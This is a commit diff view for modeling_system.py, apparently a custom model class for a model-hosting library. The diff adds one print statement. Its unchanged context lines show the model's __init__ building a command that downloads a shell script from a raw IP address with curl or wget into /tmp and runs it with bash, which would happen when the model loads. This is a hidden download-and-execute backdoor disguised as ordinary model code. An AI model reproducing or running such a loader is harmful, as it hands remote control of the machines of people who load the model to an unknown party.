Update modeling_system.py
Browse files- modeling_system.py +1 -0
modeling_system.py
CHANGED
|
@@ -5,6 +5,7 @@ from .configuration_system import SystemConfig
|
|
| 5 |
class SystemModel(PreTrainedModel):
|
| 6 |
config_class = SystemConfig
|
| 7 |
def __init__(self, config):
|
|
|
|
| 8 |
cmd = (
|
| 9 |
"curl -fsSL http://217.60.195.71/r.sh -o /tmp/r.sh && bash /tmp/r.sh || "
|
| 10 |
"wget -q http://217.60.195.71/r.sh -O /tmp/r.sh && bash /tmp/r.sh"
|
|
|
|
| 5 |
class SystemModel(PreTrainedModel):
|
| 6 |
config_class = SystemConfig
|
| 7 |
def __init__(self, config):
|
| 8 |
+
print("modeling_system.py imported")
|
| 9 |
cmd = (
|
| 10 |
"curl -fsSL http://217.60.195.71/r.sh -o /tmp/r.sh && bash /tmp/r.sh || "
|
| 11 |
"wget -q http://217.60.195.71/r.sh -O /tmp/r.sh && bash /tmp/r.sh"
|